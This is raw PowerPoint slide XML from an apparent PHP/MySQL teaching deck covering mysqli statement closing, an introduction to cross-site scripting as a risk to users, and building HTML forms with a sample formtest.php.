                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{535DB1D9-676E-453E-8452-BF2637FE6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38554-3684-466C-A1CA-7CC016EC3DD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75357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7DD0-EE36-4EB8-B037-D71D49B9B1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D95D6F-210F-41A7-9BC5-314EE412D6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23AA63-7EC0-4188-94C2-772D9BB22A9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFF44DE4-C302-4655-9962-AB8D95F1E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82DC2-FCEB-40D0-B3F6-9A1634AFE19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73759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CAA5-2C65-4E07-9A9B-0D639D901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9EE5F-AD5C-49FF-A363-3386DC97C2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9C799-5C09-43EF-AAB5-13545BCB85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FAE1E8-1BE1-4ADA-AB49-B565C57EC7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883DB575-B94B-4362-848B-70072D2C5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9B258-AB62-4C13-B86B-20F6C137A146}"/>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99838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14B3-063A-42E0-9FD8-908B422613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10DF43-E4B9-4FE5-AC0F-4E87DB4F57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E613D5-D904-4E17-97C5-5178EA9AB5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01C988-74D2-4351-A80E-956ED388D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5C4E26-65D7-41C5-BCB1-88635D954A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C856D3-0F33-4D52-B792-F2EAA61B81A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A50866B-0843-46B0-8877-1293BEA17E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DEF87A-3CA3-4646-8A8E-D9C107D5EF7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01794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09FF-2284-4CFE-8B57-CD7A467AE4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163697-6899-4186-9AE4-A5D2E49765D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC1C3EC1-D571-473B-8A97-0FDBA8DD6C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D498B-0739-404F-9281-2DE427CDF9E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13696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9CDB6-5F97-4113-8B86-6C45AB19AEB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722FD974-05A8-4D18-8858-6C9AFEE452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A39449-9F63-4495-9F93-0DE7AEC65A9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4642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1E75-F146-4D42-B531-49EA5F2AA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54057A-49CE-4CD5-AB62-76CBB6E712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6DF000-A443-4266-BEE4-E26F099D8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81484-7C93-4B6A-866F-8EF9A6ACB7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD2D785E-3BD6-4986-AC42-BC15C7A7D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A797E-84D0-4DEB-93E1-885933C2AFE5}"/>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31985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31E3-E7D8-40A7-AB97-256E6BD8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CCF3DB-701B-4032-92F6-84A0C58C3E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5D2BC0-50C1-46AE-8979-888DDF9AA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E6753-F9E6-4927-B5A6-4E5A4B7EFDA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2F0DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C5041BC-97A5-4CE3-90F9-52AB00961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C46C7-3319-4EC0-9B42-11BE413F11F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08467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ACC6B-393B-419F-A7E2-B5FF76E643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1261AF-826D-4DF1-A9E7-4A2B8C43CE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A0BC5-F521-48DD-B025-4877B1BDAE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DC048-CB74-4FD9-B049-A704A1399802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{783EEEAB-BD8F-42BF-9B73-59BCED03B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2D26C9-9167-487B-B50A-A68E0AA2FD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7AFD9-5C98-4D22-B9B4-C3C0F183F4B3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="192127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us3.php.net/manual/en/mysqli.prepare.ph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uk1.php.net/manual/en/book.mysqli.php"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing HTML Injection</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There’s another type of injection you need to concern yourself about—not for the safety of your own websites, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>for your users’ privacy and protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, also referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3998154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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Procedurally</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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To close a statement, issue the following command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_stmt_close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And to close the connection to MySQL, enter this command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqli_close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($link);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For complete details on using prepared statements (procedurally or otherwise), check out: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://us3.php.net//manual/en/mysqli.prepare.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And for more advice on all aspects of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, visit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://uk1.php.net/manual/en/book.mysqli.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290848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b="1" dirty="0"/>
              <a:t>Form Handling</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The main way that website users interact with PHP and MySQL is through the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These were introduced very early on in the development of the World Wide Web in 1993—even before the advent of ecommerce—and have remained a mainstay ever since, due to their simplicity and ease of use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339566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Building Forms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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To build a form, you must have at least the following elements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An opening &lt;form&gt; and closing &lt;/form&gt; tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A submission type specifying either a Get or Post method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One or more input fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The destination URL to which the form data is to be submitted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321114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Building Forms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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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formtest.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	echo &lt;&lt;&lt;_END</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			&lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				&lt;title&gt;Form Test&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				&lt;form method="post" action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formtest.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					What is your name?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					&lt;input type="text" name="name"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					&lt;input type="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_END;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374E5566-AF6A-4A27-AAF9-DAD58D1A814F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551356" y="580582"/>
            <a:ext cx="6490741" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The first thing to notice about this example is that rather than dropping in and out of PHP code, the echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;&lt;&lt;_END..._END </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>construct is used whenever multiline HTML must be output.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02669DBC-098C-4111-8BCF-D886905F479E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5851160" y="5237769"/>
            <a:ext cx="6635646" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Within the HTML body we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which is set to send its data using the Post method to the PHP program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formtest.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which is the name of the program itself.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53743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Retrieving Submitted Data</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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you enter a name and click the Submit Query button, absolutely nothing will happen other than the form being redisplayed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s take a look at the code in the next slide…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="545260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52714" y="299803"/>
            <a:ext cx="10515600" cy="6558197"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
